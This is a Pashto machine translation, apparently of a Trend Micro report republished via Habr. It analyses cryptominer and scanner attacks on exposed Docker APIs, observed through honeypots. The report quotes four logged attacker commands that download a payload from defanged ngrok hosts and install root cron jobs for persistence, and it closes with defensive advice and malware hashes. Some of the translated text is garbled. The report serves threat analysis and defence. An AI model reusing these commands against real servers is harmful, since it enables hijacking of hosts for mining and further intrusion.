موږ د شاتو د کانټینرونو په کارولو سره راټول شوي معلومات تحلیل کړل، کوم چې موږ د ګواښونو تعقیبولو لپاره رامینځته کړی. او موږ په ډاکر هب کې د ټولنې لخوا خپاره شوي عکس په کارولو سره د ناغوښتل شوي یا غیر مجاز کریپټو کارنسي کان کیندونکو څخه د پام وړ فعالیت کشف کړ چې د غلو کانټینرونو په توګه ګمارل شوي. عکس د خدمت د یوې برخې په توګه کارول کیږي چې ناوړه کریپټو کارنسي کان کیندنې وړاندې کوي.
سربیره پردې ، د شبکې سره د کار کولو برنامې نصب شوي ترڅو د ګاونډیو کانټینرونو او غوښتنلیکونو ته ننوځي.
موږ خپل هوني پاټونه پریږدو لکه څنګه چې دي، دا د ډیفالټ ترتیباتو سره، پرته له کوم امنیتي اقداماتو یا د اضافي سافټویر نصبولو څخه. مهرباني وکړئ په یاد ولرئ چې ډاکر د تیروتنو او ساده زیانونو مخنیوي لپاره د لومړني تنظیم کولو لپاره وړاندیزونه لري. مګر د شاتو کارول شوي کانټینرونه دي چې د کانټینر کولو پلیټ فارم په هدف د بریدونو کشف کولو لپاره ډیزاین شوي ، نه په کانټینرونو کې دننه غوښتنلیکونه.
کشف شوی ناوړه فعالیت هم د پام وړ دی ځکه چې دا زیانونو ته اړتیا نلري او د ډاکر نسخې څخه هم خپلواک دی. د غلط ترتیب شوي موندلو موندل، او له همدې امله خلاص، کانټینر عکس ټول هغه څه دي چې برید کونکي اړتیا لري ډیری خلاص سرورونه اخته کړي.
نه تړل شوی ډاکر API کارونکي ته اجازه ورکوي چې پراخه لړۍ ترسره کړي
په ښي خوا کې د مالویر تحویلي میتود دی. په ښي خوا کې د برید کونکي چاپیریال دی، کوم چې د انځورونو څخه لیرې رول کولو ته اجازه ورکوي.
د 3762 خلاص ډاکر APIs هیواد لخوا توزیع. د شوډان لټون پر اساس د 12.02.2019/XNUMX/XNUMX نیټه
د برید زنځیر او د پیل کولو اختیارونه
ناوړه فعالیت نه یوازې د شاتو په مرسته کشف شوی. د شوډان څخه ډاټا ښیې چې د افشا شوي ډاکر APIs شمیر (دوهم ګراف وګورئ) ډیر شوی ځکه چې موږ د مونرو کریپټو کارنسي کان کیندنې سافټویر ځای په ځای کولو لپاره د پل په توګه د غلط ترتیب شوي کانټینر پلټنه وکړه. د تیر کال په اکتوبر کې (2018، اوسني معلومات
د شاتو د لاګونو معاینه ښودلې چې د کانټینر عکس کارول هم د کارولو سره تړاو درلود
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
لکه څنګه چې تاسو لیدلی شئ، اپلوډ شوي فایلونه د دوامداره بدلولو URLs څخه ډاونلوډ شوي. دا URLs د پای نیټې لنډ وخت لري ، نو د پای نیټې وروسته تادیه نشي ډاونلوډ کیدی.
د پیل کولو دوه اختیارونه شتون لري. لومړی د لینکس لپاره تالیف شوی ELF ماینر دی (د Coinminer.SH.MALXMR.ATNO په توګه تعریف شوی) چې د کان کیندنې حوض سره وصل دی. دوهم یو سکریپټ دی (TrojanSpy.SH.ZNETMAP.A) د دې لپاره ډیزاین شوی چې د شبکې ځینې وسیلې ترلاسه کړي چې د شبکې رینجونو سکین کولو لپاره کارول کیږي او بیا د نوي هدفونو لټون کوي.
د ډراپر سکریپټ دوه متغیرونه ټاکي، کوم چې بیا د کریپټو کارنسي کان کیندنې لپاره کارول کیږي. د HOST متغیر یو آر ایل لري چیرې چې ناوړه فایلونه موقعیت لري، او RIP متغیر د کان کیندنې د فایل نوم (په حقیقت کې، هش) دی چې ځای پرځای کیږي. د HOST متغیر هرکله چې د هش متغیر بدل شي بدلیږي. سکریپټ دا هم هڅه کوي چې وګوري چې نور د کریپټو کارنسي کان کیندونکي په برید شوي سرور کې نه روان دي.
د HOST او RIP متغیرونو مثالونه، او همدارنګه د کوډ ټوټه د دې لپاره کارول کیږي چې وګوري نور کان کیندونکي نه دي
د کان کیندنې پیل کولو دمخه، دا د نګینکس نوم بدل شوی. د دې سکریپټ نورې نسخې د ماینر نوم نورو مشروع خدماتو ته بدلوي چې ممکن د لینکس چاپیریال کې شتون ولري. دا معمولا د چلولو پروسو لیست په وړاندې د چکونو د تیرولو لپاره کافي وي.
د لټون سکریپټ هم ځانګړتیاوې لري. دا د ورته URL خدمت سره کار کوي ترڅو اړین وسایل ځای په ځای کړي. د دوی په مینځ کې zmap بائنری دی ، کوم چې د شبکې سکین کولو او د خلاص بندرونو لیست ترلاسه کولو لپاره کارول کیږي. سکریپټ یو بل بائنری هم پورته کوي چې د موندل شوي خدماتو سره د تعامل لپاره کارول کیږي او له دوی څخه بینرونه ترلاسه کوي ترڅو د موندل شوي خدمت په اړه اضافي معلومات مشخص کړي (د مثال په توګه ، د هغې نسخه).
سکریپټ د سکین کولو لپاره ځینې شبکې سلسلې هم مخکې له مخکې ټاکي، مګر دا د سکریپټ نسخه پورې اړه لري. دا د خدماتو څخه هدف بندرونه هم ټاکي — پدې حالت کې ، ډاکر — د سکین چلولو دمخه.
هرڅومره ژر چې ممکنه اهداف وموندل شي ، بینرونه په اوتومات ډول له دوی څخه لرې کیږي. سکریپټ د خدماتو، غوښتنلیکونو، اجزاوو یا د ګټو پلیټ فارمونو پورې اړه لري هدفونه هم فلټر کوي: Redis، Jenkins، Drupal، MODX،
د برید ویکتور د ډاکر عکس دی، لکه څنګه چې د کوډ په راتلونکو دوو برخو کې لیدل کیدی شي.
په پورتنۍ برخه کې یو مشروع خدمت ته نوم بدلول دي، او په ښکته کې دا ده چې څنګه zmap د شبکې سکین کولو لپاره کارول کیږي
په پورتنۍ برخه کې د مخکینۍ ټاکل شوي شبکې سلسلې دي ، په ښکته کې د خدماتو لټون لپاره ځانګړي بندرونه دي ، پشمول د ډاکر
سکرین شاټ ښیې چې د الپین - کرل عکس له 10 ملیون څخه ډیر ځله ډاونلوډ شوی
د الپین لینکس او curl پراساس ، د مختلف پروتوکولونو کې د فایلونو لیږدولو لپاره د سرچینې اغیزمن CLI وسیله ، تاسو کولی شئ جوړ کړئ
دا مهمه ده چې په یاد ولرئ چې دا عکس (الپین-کرل) پخپله ناوړه نه دی، مګر لکه څنګه چې تاسو پورته لیدلی شئ، دا د ناوړه کارونو ترسره کولو لپاره کارول کیدی شي. ورته ډاکر عکسونه د ناوړه فعالیتونو ترسره کولو لپاره هم کارول کیدی شي. موږ د ډاکر سره اړیکه ونیوله او په دې مسله مو ورسره کار وکړ.
سپارښتنې
په دې مقاله کې بحث شوي پیښې د پیل څخه د خوندیتوب په پام کې نیولو اړتیا په ګوته کوي، په شمول د لاندې سپارښتنو په شمول:
- د سیسټم مدیرانو او پراختیا کونکو لپاره: تل خپل API تنظیمات چیک کړئ ترڅو ډاډ ترلاسه کړئ چې هرڅه یوازې د ځانګړي سرور یا داخلي شبکې څخه غوښتنې منلو لپاره تنظیم شوي.
- د لږترلږه حقونو اصول تعقیب کړئ: ډاډ ترلاسه کړئ چې د کانټینر عکسونه لاسلیک شوي او تایید شوي، مهم اجزاو ته لاسرسی محدود کړئ (د کانټینر لانچ خدمت) او د شبکې اړیکو ته کوډ کول اضافه کړئ.
- تعقیب کړئ
سپارښتنې او د امنیت میکانیزم فعالول، د بیلګې په توګهد ډاکر څخه او جوړ شویامنیتي ځانګړتیاوې . - په کانټینر کې د پروسو په اړه اضافي معلومات ترلاسه کولو لپاره د چلولو وختونو او عکسونو اتوماتیک سکینګ وکاروئ (د مثال په توګه ، د سپف کولو کشف کول یا د زیانونو لټون کول). د غوښتنلیک کنټرول او بشپړتیا څارنه په سرورونو، فایلونو، او سیسټم ساحو کې د غیر معمولي بدلونونو تعقیبولو کې مرسته کوي.
Trendmicro د DevOps ټیمونو سره په خوندي ډول رامینځته کولو کې مرسته کوي ، په چټکۍ سره رامینځته کیږي ، او هرچیرې پیل کوي. رجحان مایکرو
د جوړجاړي نښې
اړوند هشونه:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
په
سرچینه: www.habr.com